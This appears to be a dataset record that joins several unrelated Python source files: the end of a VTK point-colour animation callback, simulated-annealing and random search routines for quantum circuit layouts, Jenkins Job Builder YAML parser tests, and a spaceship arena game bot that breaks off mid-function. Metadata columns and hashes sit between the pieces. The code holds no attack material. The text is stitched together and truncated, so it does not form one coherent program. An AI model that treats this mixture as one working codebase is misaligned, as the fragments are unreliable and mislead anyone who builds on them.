# self.points_poly.GetPointData().GetScalars().Modified()
self.points_poly.Modified()
def setup_lerp_all_point_colors(self, color, fade_time):
"""
Sets all points to the same color, but uses lerping to slowly change the colors.
Args:
color ():
fade_time ():
"""
np_color_data = numpy_support.vtk_to_numpy(self.point_colors)
self.next_colors = np.tile(color, (np_color_data.shape[0], 1))
self.prev_colors = numpy_support.vtk_to_numpy(self.point_colors)
self.lerp_fade_time = fade_time
self.remaining_lerp_fade_time = fade_time
def lerp_point_colors(self, colors, fade_time, point_indices=None):
"""
Sets colors for specific points, but uses lerping to slowly change those colors.
Args:
colors ():
fade_time ():
point_indices ():
"""
if isinstance(self.next_colors, (np.ndarray, np.generic)):
if isinstance(point_indices, (list, tuple, np.ndarray, np.generic)):
self.next_colors[point_indices] = colors
else:
self.next_colors = colors
self.next_color_indices = None
elif isinstance(point_indices, (list, tuple, np.ndarray, np.generic)) or isinstance(colors, (list, tuple)):
if self.lerp_fade_time > 0:
self.next_colors = np.append(self.next_colors, colors)
if point_indices is not None:
self.next_color_indices = np.append(self.next_color_indices, point_indices)
else:
self.next_colors = colors
self.next_color_indices = point_indices
        # must not already be lerping
self.prev_colors = numpy_support.vtk_to_numpy(self.point_colors)
# fade time in seconds, float
self.lerp_fade_time = fade_time
self.remaining_lerp_fade_time = fade_time
def set_lerp_remainder(self, lerp_remainder):
"""
Sets the portion of color from the previous color set remains after the lerp has been fully run.
Args:
lerp_remainder ():
"""
self.lerp_multiplier = 1 - lerp_remainder
def _calculate_point_color_lerp(self):
"""
Linearly interpolates colors. In addition to making animation look smoother, it helps prevent seizures a little.
Only a little though, and it has to be used correctly. Still, using it at all helps.
"""
if self.remaining_lerp_fade_time > 0:
# print(self.lerp_fade_time, self.remaining_lerp_fade_time)
lerp_val = self.lerp_multiplier * (
self.lerp_fade_time - self.remaining_lerp_fade_time) / self.lerp_fade_time
# print(lerp_val)
diff_array = (self.prev_colors - self.next_colors)
lerp_diff_array = diff_array * lerp_val
# print(lerp_diff_array)
lerp_colors = self.prev_colors - lerp_diff_array
# print(lerp_colors)
if isinstance(lerp_colors, (np.ndarray, np.generic)):
vtk_data = numpy_support.numpy_to_vtk(num_array=lerp_colors, deep=True,
array_type=vtk.VTK_UNSIGNED_CHAR)
self.point_colors.DeepCopy(vtk_data)
# self.points_poly.GetPointData().GetScalars().Modified()
self.points_poly.Modified()
self.remaining_lerp_fade_time -= self.loop_change_in_time
# print(self.remaining_lerp_fade_time)
def position_points(self, positions, point_indices=None):
#todo:unit test
"""
Untested with most recent changes.
Sets the positions of specific points, all points, or one point.
Args:
positions ():
point_indices ():
"""
        if point_indices is None:
vtk_data = numpy_support.numpy_to_vtk(num_array=positions, deep=True, array_type=vtk.VTK_FLOAT)
self.points.DeepCopy(vtk_data)
elif isinstance(point_indices, (list, tuple)):
if isinstance(positions, (list, tuple)):
for i in range(len(point_indices)):
x, y, z = positions[i % len(positions)]
self.points.SetPoint(point_indices[i], (x, y, z))
else:
for i in range(len(point_indices)):
x, y, z = positions
self.points.SetPoint(point_indices[i], (x, y, z))
else:
x, y, z = positions
self.points.SetPoint(point_indices, (x, y, z))
self.points_poly.Modified()
def add_key_input_functions(self, keydic):
"""
Sets functions to be called when specific keys are pressed, in order from shallowest to deepest dictionaries.
If a key is already in the dictionary, it will be replaced.
Args:
keydic ():
"""
self.interactor_style.append_input_combinations(keydic)
def at_start(self):
"""
Function to be run after class instantiation and vtk start up. Useful for setting things that can only be set
after VTK is running.
"""
pass
def loop(self, obj, event):
"""
Function called every few milliseconds when VTK is set to call. Variables that need updating like change_in_time
can be set here.
Args:
obj ():
event ():
"""
self.loop_change_in_time = time.clock() - self._loop_time
self._loop_time = time.clock()
self._calculate_point_color_lerp()
pass
def at_end(self):
"""
Function called when animation is ended.
"""
self.interactive_renderer.RemoveAllObservers()
def exit(self):
# needed to stop previous setups from being run on next class call
# proper cleanup
self.interactive_renderer.TerminateApp()
def execute(self, obj, event):
"""
Function called to start animation.
Args:
obj ():
event ():
"""
if not self._started:
self.at_start()
self._started = True
self.loop(obj, event)
self.points_poly.GetPointData().GetScalars().Modified()
self.points_poly.Modified()
self.interactive_renderer = obj
self.interactive_renderer.GetRenderWindow().Render()
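# A minimal subclass sketch showing how the callback above is typically extended;
# it assumes the surrounding svtk code attaches `points`, `point_colors`,
# `points_poly`, the renderer, etc. before the VTK timer starts firing.
class PulseWhiteCallback(VTKAnimationTimerCallback):
    """Fades every point to white over one second when the animation starts."""

    def at_start(self):
        self.setup_lerp_all_point_colors([255, 255, 255], 1.0)

    def loop(self, obj, event):
        # keep the base-class bookkeeping (loop timing and color lerp) running
        super(PulseWhiteCallback, self).loop(obj, event)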
| 40.629151
| 121
| 0.608374
| 21,780
| 0.989056
| 0
| 0
| 0
| 0
| 0
| 0
| 6,148
| 0.279188
|
c41c57d2fe8c5d4f03096ac847acc8fe35f19ed2
| 3,679
|
py
|
Python
|
work/ArchitectureSearch.py
|
jialiasus2/AI-Studio-Contest-Quantum202103
|
350f20b8805e9696cacacc1339e71bf695571e74
|
[
"Apache-2.0"
] | null | null | null |
work/ArchitectureSearch.py
|
jialiasus2/AI-Studio-Contest-Quantum202103
|
350f20b8805e9696cacacc1339e71bf695571e74
|
[
"Apache-2.0"
] | null | null | null |
work/ArchitectureSearch.py
|
jialiasus2/AI-Studio-Contest-Quantum202103
|
350f20b8805e9696cacacc1339e71bf695571e74
|
[
"Apache-2.0"
] | null | null | null |
import time
import numpy as np
from tqdm import tqdm
from utils import RandomCNOT, RandomCNOTs
def SimulatedAnnealing(quantum_count, layer_count, solver, epochs=100, save_path=None, global_best_score=0):
#TODO:
best_score = 0
cnot = RandomCNOTs(quantum_count, layer_count)
sc, model = solver(cnot)
if sc>best_score:
best_score = sc
cnot_seed = cnot
best_model = model
best_cnot = cnot
if save_path is not None and best_score>global_best_score:
with open(save_path, 'w') as f:
f.write(best_model)
start_time = time.time()
for epoch in range(epochs):
for i in range(layer_count):
cnot_layers = cnot_seed.copy()
cnot_layers[i] = RandomCNOT(quantum_count)
sc, model = solver(cnot_layers)
if sc>best_score or np.random.randint(epochs)>epoch:
cnot_seed = cnot_layers
if sc>best_score:
best_score = sc
best_model = model
best_cnot = cnot_layers
if save_path is not None and best_score>global_best_score:
with open(save_path, 'w') as f:
f.write(best_model)
print('epoch %d, iter %d, Score = %g, best_score = %g, global_best_score = %g, time = %gs'%(epoch, i, sc, best_score, global_best_score, time.time()-start_time))
# print(best_model)
return best_score, best_model, best_cnot
def SequenceJitter(quantum_count, layer_count, solver, init_epochs=10, epochs=100, save_path=None, global_best_score=0):
#TODO:
best_score = 0
print('Init cnot seed.')
for _ in tqdm(range(init_epochs)):
cnot = RandomCNOTs(quantum_count, layer_count)
sc, model = solver(cnot)
if sc>best_score:
best_score = sc
cnot_seed = cnot
best_model = model
best_cnot = cnot
if save_path is not None and best_score>global_best_score:
with open(save_path, 'w') as f:
f.write(best_model)
start_time = time.time()
for epoch in range(epochs):
for i in range(layer_count):
cnot_layers = cnot_seed.copy()
cnot_layers[i] = RandomCNOT(quantum_count)
sc, model = solver(cnot_layers)
if sc>best_score:
best_score = sc
cnot_seed = cnot_layers
best_model = model
best_cnot = cnot_layers
if save_path is not None and best_score>global_best_score:
with open(save_path, 'w') as f:
f.write(best_model)
print('Score = %g, best_score = %g, global_best_score = %g, time = %gs'%(sc, best_score, global_best_score, time.time()-start_time))
# print(best_model)
return best_score, best_model, best_cnot
def RandomSearch(cnot_creater, solver, epochs=100, save_path=None):
    '''
    Random search.
    Parameters:
        cnot_creater: a callable that generates a CNOT layer arrangement
        solver: a callable that, given a network architecture, solves for the network parameters
        epochs: number of random-search rounds
        save_path: path where the best result is saved
    '''
best_score = 0
start_time = time.time()
for epoch in range(epochs):
cnot_layers = cnot_creater()
sc, model = solver(cnot_layers)
if sc>best_score:
best_score = sc
best_model = model
if save_path is not None:
with open(save_path, 'w') as f:
f.write(best_model)
print('No_%d: score = %g, best_score = %g, time = %gs'%(epoch, sc, best_score, time.time()-start_time))
# print(best_model)
return best_score, best_model
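# A minimal wiring sketch for RandomSearch with a stand-in solver; the real
# solver, qubit count and layer count come from the rest of this project, and
# the sizes below are assumptions used only for illustration.
if __name__ == '__main__':
    QUBITS, LAYERS = 4, 3  # assumed sizes

    def dummy_solver(cnot_layers):
        # returns (score, serialized_model); replace with the project's solver
        return float(np.random.rand()), 'dummy-model'

    best_score, best_model = RandomSearch(
        lambda: RandomCNOTs(QUBITS, LAYERS), dummy_solver, epochs=5)
    print('best score:', best_score)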
| 38.322917
| 173
| 0.59527
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 576
| 0.152019
|
c41c9ed8f0eeeb7bc96538ff09de8ee1da20fa88
| 4,113
|
py
|
Python
|
tests/localyaml/test_localyaml.py
|
sbussetti/jenkins-job-builder
|
fc63f1439816d9022a2d538614b0b7592f96b454
|
[
"Apache-2.0"
] | 1
|
2021-07-30T04:03:53.000Z
|
2021-07-30T04:03:53.000Z
|
tests/localyaml/test_localyaml.py
|
sbussetti/jenkins-job-builder
|
fc63f1439816d9022a2d538614b0b7592f96b454
|
[
"Apache-2.0"
] | 12
|
2020-05-29T05:33:48.000Z
|
2020-09-29T13:02:29.000Z
|
tests/localyaml/test_localyaml.py
|
sbussetti/jenkins-job-builder
|
fc63f1439816d9022a2d538614b0b7592f96b454
|
[
"Apache-2.0"
] | 2
|
2020-05-15T08:29:33.000Z
|
2020-06-04T07:27:31.000Z
|
#!/usr/bin/env python
#
# Copyright 2013 Darragh Bailey
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import yaml
from testtools import ExpectedException
from yaml.composer import ComposerError
from jenkins_jobs.config import JJBConfig
from jenkins_jobs.parser import YamlParser
from tests import base
def _exclude_scenarios(input_filename):
return os.path.basename(input_filename).startswith("custom_")
class TestCaseLocalYamlInclude(base.JsonTestCase):
"""
Verify application specific tags independently of any changes to
modules XML parsing behaviour
"""
fixtures_path = os.path.join(os.path.dirname(__file__), "fixtures")
scenarios = base.get_scenarios(
fixtures_path, "yaml", "json", filter_func=_exclude_scenarios
)
def test_yaml_snippet(self):
if os.path.basename(self.in_filename).startswith("exception_"):
with ExpectedException(ComposerError, "^found duplicate anchor .*"):
super(TestCaseLocalYamlInclude, self).test_yaml_snippet()
else:
super(TestCaseLocalYamlInclude, self).test_yaml_snippet()
class TestCaseLocalYamlAnchorAlias(base.YamlTestCase):
"""
Verify yaml input is expanded to the expected yaml output when using yaml
anchors and aliases.
"""
fixtures_path = os.path.join(os.path.dirname(__file__), "fixtures")
scenarios = base.get_scenarios(fixtures_path, "iyaml", "oyaml")
class TestCaseLocalYamlIncludeAnchors(base.BaseTestCase):
fixtures_path = os.path.join(os.path.dirname(__file__), "fixtures")
def test_multiple_same_anchor_in_multiple_toplevel_yaml(self):
"""
Verify that anchors/aliases only span use of '!include' tag
To ensure that any yaml loaded by the include tag is in the same
space as the top level file, but individual top level yaml definitions
are treated by the yaml loader as independent.
"""
files = [
"custom_same_anchor-001-part1.yaml",
"custom_same_anchor-001-part2.yaml",
]
jjb_config = JJBConfig()
jjb_config.jenkins["url"] = "http://example.com"
jjb_config.jenkins["user"] = "jenkins"
jjb_config.jenkins["password"] = "password"
jjb_config.builder["plugins_info"] = []
jjb_config.validate()
j = YamlParser(jjb_config)
j.load_files([os.path.join(self.fixtures_path, f) for f in files])
class TestCaseLocalYamlRetainAnchors(base.BaseTestCase):
fixtures_path = os.path.join(os.path.dirname(__file__), "fixtures")
def test_retain_anchors_default(self):
"""
Verify that anchors are NOT retained across files by default.
"""
files = ["custom_retain_anchors_include001.yaml", "custom_retain_anchors.yaml"]
jjb_config = JJBConfig()
# use the default value for retain_anchors
jjb_config.validate()
j = YamlParser(jjb_config)
with ExpectedException(yaml.composer.ComposerError, "found undefined alias.*"):
j.load_files([os.path.join(self.fixtures_path, f) for f in files])
def test_retain_anchors_enabled(self):
"""
Verify that anchors are retained across files if retain_anchors is
enabled in the config.
"""
files = ["custom_retain_anchors_include001.yaml", "custom_retain_anchors.yaml"]
jjb_config = JJBConfig()
jjb_config.yamlparser["retain_anchors"] = True
jjb_config.validate()
j = YamlParser(jjb_config)
j.load_files([os.path.join(self.fixtures_path, f) for f in files])
| 33.991736
| 87
| 0.699733
| 3,182
| 0.773645
| 0
| 0
| 0
| 0
| 0
| 0
| 1,784
| 0.433747
|
c41dbd4f1116c76a73c6b7f3a90d3a40a1fa6018
| 24,625
|
py
|
Python
|
seijibot.py
|
seiji56/bot-tac
|
b16b8a8a79d6ac2deb0476ab3a9a0e0b136b1d54
|
[
"MIT"
] | null | null | null |
seijibot.py
|
seiji56/bot-tac
|
b16b8a8a79d6ac2deb0476ab3a9a0e0b136b1d54
|
[
"MIT"
] | null | null | null |
seijibot.py
|
seiji56/bot-tac
|
b16b8a8a79d6ac2deb0476ab3a9a0e0b136b1d54
|
[
"MIT"
] | null | null | null |
from bot_interface import *
import math
class SeijiBot(BotBase):
def __init__(self):
self.initialized = False
def initialize(self, gamestate):
gamestate.log("Initializing...")
#Getting UID
self.uid = gamestate.bot.uid
gamestate.log("This ship has uid " + str(self.uid))
#Getting time step
self.step = gamestate.timestep
gamestate.log("Initialized with timestep of " + str(self.step) + "s")
gamestate.log("Ships have a " + str(gamestate.ships[self.uid].radius) + "m radius")
#Setting Global constants
self.mass = 1
self.main_thrust = 30
self.side_thrust = 15
self.side_thrust_offset = 2
self.laser_charge_time = .5
self.initialized = True
#From here are some useful functions
#Side functions
def solveQuad(self, a, b, c):
if a == 0:
return None
delta = b**2 - 4*a*c
if delta < 0:
return None
if delta == 0:
return (-b)/(2*a), (-b)/(2*a)
delta = math.sqrt(delta)
return (((-b)-delta)/(2*a), ((-b)+delta)/(2*a))
def dist(self, obj1, obj2):
return math.sqrt((obj1.posx - obj2.posx)**2 + (obj1.posy - obj2.posy)**2)
def toRad(self, angle):
return (float(angle)/180)*math.pi
def sign(self, n):
if n == 0:
return 0
return n/abs(n)
def fmod(self, n, k):
d = math.floor(n/k)
return n - k*d
def glob_loc(self, x1, y1, angle, x2, y2):
rx, ry = x2 - x1, y2 - y1
tx, ty = math.cos(-angle) * rx - math.sin(-angle) * ry, math.cos(-angle) * ry + math.sin(-angle) * rx
return tx, ty
def normalize(self, vec):
sqrl = 0
for i in vec:
sqrl += i**2
l = math.sqrt(sqrl)
if l == 0.0:
return vec
res = []
for i in vec:
res.append(i/l)
return res
def invert(self, vec):
return [-i for i in vec]
#Movement functions
#Change angular speed - It doesn't change linear velocity
#Returns -> thruster value
def angularSpeed(self, ship, final_speed):
k = .1
vel = self.toRad(ship.velang)
delta = final_speed - vel
ret = delta*k
if ret > 1:
ret = 1
elif ret < -1:
ret = -1
return -ret
def angDelta(self, ship, angle):
delta = self.fmod(angle + 2*math.pi, 2*math.pi) - self.fmod(self.fmod(self.toRad(ship.ang), 2*math.pi) + 2*math.pi, 2*math.pi)
if abs(delta) > math.pi:
delta = (2*math.pi - abs(delta))*self.sign(-delta)
return delta
#Control ship rotation to certain angle - It doesn't change linear velocity
#Returns -> thruster value
def lookAt(self, ship, final_ang):
kP, kD = .6, 3.5
out = -kP*self.angDelta(ship, final_ang) + kD*self.toRad(ship.velang)*self.step
if out > 1:
out = 1
elif out < -1:
out = -1
return out
#Accelerate ship towards certain coordinate - It doesn't change velang
#Returns -> main thruster value, frontal thruster value, back thruster value
def accelerateTo(self, ship, towx, towy, pot = 1):
tstep = self.step
fmax = self.main_thrust/self.mass
angles = self.toRad(ship.ang)
x, y = self.glob_loc(ship.posx, ship.posy, angles, towx, towy)
res = [0, 0, 0]
cx, cy = self.normalize([x, y])
res[0] = -cy*pot
res[1] = cx*pot
res[2] = cx*pot
return res
#Estimating objects
def estimateObj(self, obj, time = None):
if time == None:
time = self.step
objest = obj
objest.posx += objest.velx*time
objest.posy += objest.vely*time
return objest
def estimateRock(self, obj, time = None):
if time == None:
time = self.step
objest = obj
objest.posx += objest.velx*time
objest.posy += objest.vely*time
return objest
def estimateShip(self, obj, time = None):
if time == None:
time = self.step
objest = obj
objest.posx += objest.velx*time
objest.posy += objest.vely*time
objest.ang += objest.velang*time
return objest
def estimateLaser(self, obj, time = None):
if time == None:
time = self.step
objest = obj
objest.posx += objest.velx*time
objest.posy += objest.vely*time
objest.lifetime -= time
return objest
#Estimating Time of Collision
#Returns -> Time(seconds) for collision of obj1 and obj2: MIN, MAX
def toC(self, obj1, obj2, error_margin):
A = obj1.posx
a = obj1.velx
B = obj2.posx
b = obj2.velx
C = obj1.posy
c = obj1.vely
D = obj2.posy
d = obj2.vely
R = obj1.radius + error_margin/2
r = obj2.radius + error_margin/2
Asq = A**2
asq = a**2
Bsq = B**2
bsq = b**2
Csq = C**2
csq = c**2
Dsq = D**2
dsq = d**2
Rsq = R**2
rsq = r**2
div = asq - 2*a*b + bsq + csq - 2*c*d + dsq
delta = (-Asq*csq + 2*Asq*c*d - Asq*dsq + 2*A*B*csq - 4*A*B*c*d + 2*A*B*dsq + 2*A*C*a*c - 2*A*C*a*d - 2*A*C*b*c + 2*A*C*b*d - 2*A*D*a*c + 2*A*D*a*d + 2*A*D*b*c - 2*A*D*b*d - Bsq*csq + 2*Bsq*c*d - Bsq*dsq - 2*B*C*a*c + 2*B*C*a*d + 2*B*C*b*c - 2*B*C*b*d + 2*B*D*a*c - 2*B*D*a*d - 2*B*D*b*c + 2*B*D*b*d - Csq*asq + 2*Csq*a*b - Csq*bsq + 2*C*D*asq - 4*C*D*a*b + 2*C*D*bsq - Dsq*asq + 2*Dsq*a*b - Dsq*bsq + Rsq*asq - 2*Rsq*a*b + Rsq*bsq + Rsq*csq - 2*Rsq*c*d + Rsq*dsq + 2*R*asq*r - 4*R*a*b*r + 2*R*bsq*r + 2*R*csq*r - 4*R*c*d*r + 2*R*dsq*r + asq*rsq - 2*a*b*rsq + bsq*rsq + csq*rsq - 2*c*d*rsq + dsq*rsq)
minusb = (-A*a + A*b + B*a - B*b - C*c + C*d + D*c - D*d)
if div == 0 or delta < 0:
return None
else:
res0 = (minusb - math.sqrt(delta))/(div)
res1 = (minusb + math.sqrt(delta))/(div)
return res0, res1
#Predictive shooting of moving target
#Returns -> Time(seconds) for shoot to reach target on line, coordinates x and y for the shoot to be 'centered'
def predShoot(self, ship, target, speed, gamestate):
tx = target.posx - ship.posx
ty = target.posy - ship.posy
tvx = target.velx - ship.velx
tvy = target.vely - ship.vely
a = tvx**2 + tvy**2 - speed**2
b = 2*(tvx*tx + tvy * ty)
c = tx**2 + ty**2
r = self.solveQuad(a, b, c)
if r == None:
return None
else:
r0, r1 = r
if r1 < 0 and r0 < 0:
return None
elif r0 < 0:
coords = (target.posx + tvx*r1, target.posy + tvy*r1)
return r1, coords
else:
coords = (target.posx + tvx*r0, target.posy + tvy*r0)
return r0, coords
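    # Worked example of the intercept math above: with the shooter at rest, a
    # target 30 m away along x moving at 10 m/s along y, and a 25 m/s shot, the
    # quadratic (|v|^2 - s^2) t^2 + 2 (p.v) t + |p|^2 = 0 becomes
    # -525 t^2 + 0 t + 900 = 0, so solveQuad yields t = sqrt(900/525) ~ 1.31 s,
    # and the aim point is the target advanced by that time at its relative velocity.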
target = None
ok = False
ltick = 0
def process(self, gamestate):
if not self.initialized:
self.initialize(gamestate)
return Action(0, .1, .1, 0)
try:
sgargs = gamestate.ships[self.target]
except:
self.target = None
self.ok = False
if len(gamestate.ships) > 1 and not self.ok:
for i in gamestate.ships:
if i is not self.uid:
self.ok = True
self.target = i
gamestate.log("Following ship " + str(i))
break
s_ship = gamestate.ships[self.uid]
zero = 0
out = [0, 0, 0]
avoid = [0, 0, 0]
rotation_out = 0
rot_mean = 0
out_s = 0
self.ltick = gamestate.tick
#Targeting and shooting
for ship_uid in gamestate.ships:
if self.uid == ship_uid:
continue
ship = gamestate.ships[ship_uid]
if self.dist(ship, s_ship) < self.dist(gamestate.ships[self.target], s_ship):
self.target = ship_uid
if(self.target is not None):
targetp = self.estimateShip(gamestate.ships[self.target], self.step)
shipp = self.estimateShip(s_ship, self.step)
prediction0 = None
prediction1 = None
prediction2 = None
shoot_type = 0
min_time = 9999
if shipp.charge >= 3:
predictiont = self.predShoot(shipp, targetp, 75, gamestate)
if predictiont is not None:
time, coords = predictiont
time += self.step
if time < .8:
prediction2 = predictiont
if shipp.charge >= 2:
predictiont = self.predShoot(shipp, targetp, 50, gamestate)
if predictiont is not None:
time, coords = predictiont
time += self.step
if time < .6:
prediction1 = predictiont
if shipp.charge >= 1:
predictiont = self.predShoot(shipp, targetp, 25, gamestate)
if predictiont is not None:
time, coords = predictiont
time += self.step
if time < .4:
prediction0 = predictiont
time, coords = None, None
if prediction2 is not None:
time, coords = prediction2
time += self.step
if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < .1:
out_s = 3
if prediction1 is not None:
time, coords = prediction1
time += self.step
if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < .1:
out_s = 2
if prediction0 is not None:
time, coords = prediction0
time += self.step
if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < .1:
out_s = 1
if time is not None:
rotation_out += self.lookAt(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy ))
rot_mean += 1
else:
rotation_out += self.lookAt(shipp, math.atan2(shipp.posx - targetp.posx,targetp.posy - shipp.posy ))
#Avoidance code
#Avoid rocks
rock_repel_r = 15
rock_repel_t = 5
rock_less = 9999
rock_less_uid = None
for rock_uid in gamestate.rocks:
rock = gamestate.rocks[rock_uid]
dist = self.dist(s_ship, rock)
final = [0, 0, 0]
if dist <= rock_repel_r:
tmp = self.accelerateTo(s_ship, 2*s_ship.posx - rock.posx, 2*s_ship.posy - rock.posy, math.sqrt((rock_repel_r-dist)/rock_repel_r))
avoid[0] += tmp[0]
avoid[1] += tmp[1]
avoid[2] += tmp[2]
toc = self.toC(rock, s_ship, .1)
if not toc == None:
if toc[0] > 0:
gamestate.log("Rock of uid " + str(rock_uid) + ": Will collide in " + ('%.2f' % toc[0]) + " seconds")
shp = self.estimateShip(s_ship, toc[0])
rck = self.estimateRock(rock, toc[0])
if toc[0] <= rock_repel_t:
tmp = self.accelerateTo(shp, 2*shp.posx - rck.posx, 2*shp.posy - rck.posy, math.sqrt((rock_repel_t-toc[0])/rock_repel_t))
final[0] += tmp[0]
final[1] += tmp[1]
final[2] += tmp[2]
if rock_less > toc[0]:
rock_less = toc[0]
rock_less_uid = rock_uid
out[0] += final[0]
out[1] += final[1]
out[2] += final[2]
#Avoid lasers
laser_repel_r = 15
laser_repel_t = 3
laser_less = 9999
laser_less_uid = None
for laser_uid in gamestate.lasers:
laser = gamestate.lasers[laser_uid]
dist = self.dist(s_ship, laser)
final = [0, 0, 0]
if dist <= laser_repel_r:
tmp = self.accelerateTo(s_ship, 2*s_ship.posx - laser.posx, 2*s_ship.posy - laser.posy, math.sqrt((laser_repel_r-dist)/laser_repel_r))
avoid[0] += tmp[0]
avoid[1] += tmp[1]
avoid[2] += tmp[2]
toc = self.toC(laser, s_ship, .1)
if not toc == None:
if toc[0] > 0:
if toc[0] <= laser.lifetime:
gamestate.log("Shot of uid " + str(laser_uid) + " from " + str(laser.owner) + ": Will hit in " + ('%.2f' % toc[0]) + " seconds")
shp = self.estimateShip(s_ship, toc[0])
lsr = self.estimateLaser(laser, toc[0])
shipp = self.estimateShip(s_ship, self.step)
las = self.estimateLaser(laser, self.step)
prediction = self.predShoot(shipp, las, 75, gamestate)
if prediction is not None:
time, coords = prediction
time += self.step
gamestate.log(str())
if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < .1:
out_s = 3
prediction = self.predShoot(shipp, las, 50, gamestate)
if prediction is not None:
time, coords = prediction
time += self.step
if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < .1:
out_s = 2
prediction = self.predShoot(shipp, las, 25, gamestate)
if prediction is not None:
time, coords = prediction
time += self.step
if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < .1:
out_s = 1
if toc[0] <= laser_repel_t:
tmp = self.accelerateTo(s_ship, 2*shp.posx - lsr.posx, 2*shp.posy - lsr.posy, math.sqrt((laser_repel_t-toc[0])/laser_repel_t))
final[0] += tmp[0]
final[1] += tmp[1]
final[2] += tmp[2]
if laser_less > toc[0]:
laser_less = toc[0]
laser_less_uid = laser_uid
else:
gamestate.log("Shot of uid " + str(laser_uid) + " from " + str(laser.owner) + ": Will not hit. Just " + ('%.2f' % laser.lifetime) + " seconds remaining.")
out[0] += final[0]
out[1] += final[1]
out[2] += final[2]
#Try not to collide with the arena
arenac = 1
if math.sqrt(s_ship.posx**2 + s_ship.posy**2) > gamestate.arenaRadius - 5:
tmp = self.accelerateTo(s_ship, 0, 0, (math.sqrt(s_ship.posx**2 + s_ship.posy**2) - (gamestate.arenaRadius - 5))/5)
out[0] += tmp[0]*arenac
out[1] += tmp[1]*arenac
out[2] += tmp[2]*arenac
#Stay at a distance from target
attrcnt = .3
if self.target is not None:
target_r = 30
dist = self.dist(s_ship, gamestate.ships[self.target])
linpot = 0
            if target_r - dist != 0:
linpot = target_r/(dist - target_r)
tmp = self.accelerateTo(s_ship, gamestate.ships[self.target].posx, gamestate.ships[self.target].posy, (linpot**8)*self.sign(linpot))
tmp = self.normalize(tmp)
mx = max(abs(tmp[0]), abs(tmp[1]), abs(tmp[2]))
if mx != 0:
mx = 1/mx
avoid[0] += tmp[0]*mx*attrcnt
avoid[1] += tmp[1]*mx*attrcnt
avoid[2] += tmp[2]*mx*attrcnt
#Keep track of ship headings/ships targeting self
predeyesight = .5
for ship_uid in gamestate.ships:
if ship_uid is self.uid:
continue
ship = gamestate.ships[ship_uid]
targetp = self.estimateShip(s_ship, self.step)
shipp = self.estimateShip(ship, self.step)
prediction = None
shoot_type = 0
if shipp.charge < 2 and shipp.charge >= 1:
prediction0 = self.predShoot(shipp, targetp, 25, gamestate)
prediction1 = None
prediction2 = None
elif shipp.charge < 3:
prediction0 = self.predShoot(shipp, targetp, 25, gamestate)
prediction1 = self.predShoot(shipp, targetp, 50, gamestate)
prediction2 = None
else:
prediction0 = self.predShoot(shipp, targetp, 25, gamestate)
prediction1 = self.predShoot(shipp, targetp, 50, gamestate)
prediction2 = self.predShoot(shipp, targetp, 75, gamestate)
if prediction2 is not None:
time, coords = prediction2
time += self.step
laser = Laser(0)
laser.lifetime = 3
laser.owner = ship_uid
laser.posx = shipp.posx
laser.posy = shipp.posy
laser.velx = shipp.velx + 75*math.sin(self.toRad(shipp.ang))
                laser.vely = shipp.vely + 75*math.cos(self.toRad(shipp.ang))
if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < 2:
if time < 1:
shp = self.estimateShip(s_ship, time)
lsr = self.estimateLaser(laser, time)
tmp = self.accelerateTo(s_ship, 2*shp.posx - lsr.posx, 2*shp.posy - lsr.posy, math.sqrt((laser_repel_t-time)/laser_repel_t))
avoid[0] += tmp[0]*predeyesight
avoid[1] += tmp[1]*predeyesight
avoid[2] += tmp[2]*predeyesight
gamestate.log("Ship " + str(ship_uid) + " is targeting at 75m/s...")
elif prediction1 is not None:
time, coords = prediction1
time += self.step
laser = Laser(0)
laser.lifetime = 3
laser.owner = ship_uid
laser.posx = shipp.posx
laser.posy = shipp.posy
laser.velx = shipp.velx + 50*math.sin(self.toRad(shipp.ang))
                laser.vely = shipp.vely + 50*math.cos(self.toRad(shipp.ang))
if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < 2:
if time < 1:
shp = self.estimateShip(s_ship, time)
lsr = self.estimateLaser(laser, time)
tmp = self.accelerateTo(s_ship, 2*shp.posx - lsr.posx, 2*shp.posy - lsr.posy, math.sqrt((laser_repel_t-time)/laser_repel_t))
avoid[0] += tmp[0]*predeyesight
avoid[1] += tmp[1]*predeyesight
avoid[2] += tmp[2]*predeyesight
gamestate.log("Ship " + str(ship_uid) + " is targeting at 50m/s...")
if prediction0 is not None:
time, coords = prediction0
time += self.step
laser = Laser(0)
laser.lifetime = 3
laser.owner = ship_uid
laser.posx = shipp.posx
laser.posy = shipp.posy
laser.velx = shipp.velx + 25*math.sin(self.toRad(shipp.ang))
                laser.vely = shipp.vely + 25*math.cos(self.toRad(shipp.ang))
if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < 2:
if time < 1:
shp = self.estimateShip(s_ship, time)
lsr = self.estimateLaser(laser, time)
tmp = self.accelerateTo(s_ship, 2*shp.posx - lsr.posx, 2*shp.posy - lsr.posy, math.sqrt((laser_repel_t-time)/laser_repel_t))
avoid[0] += tmp[0]*predeyesight
avoid[1] += tmp[1]*predeyesight
avoid[2] += tmp[2]*predeyesight
gamestate.log("Ship " + str(ship_uid) + " is targeting at 25m/s...")
#apply rotations and final weight calculation
peravd = 2
out[0] += avoid[0]*peravd
out[1] += avoid[1]*peravd
out[2] += avoid[2]*peravd
mx = 1
#out = self.normalize(out)
#mx = max(abs(out[0]), abs(out[1]), abs(out[2]))
#if mx != 0:
# mx = 1/mx
#mx = 1
rotmulti = 1
#out[0] = 0
out[1] += rotation_out*rotmulti
out[2] += -rotation_out*rotmulti
#out_s = 0
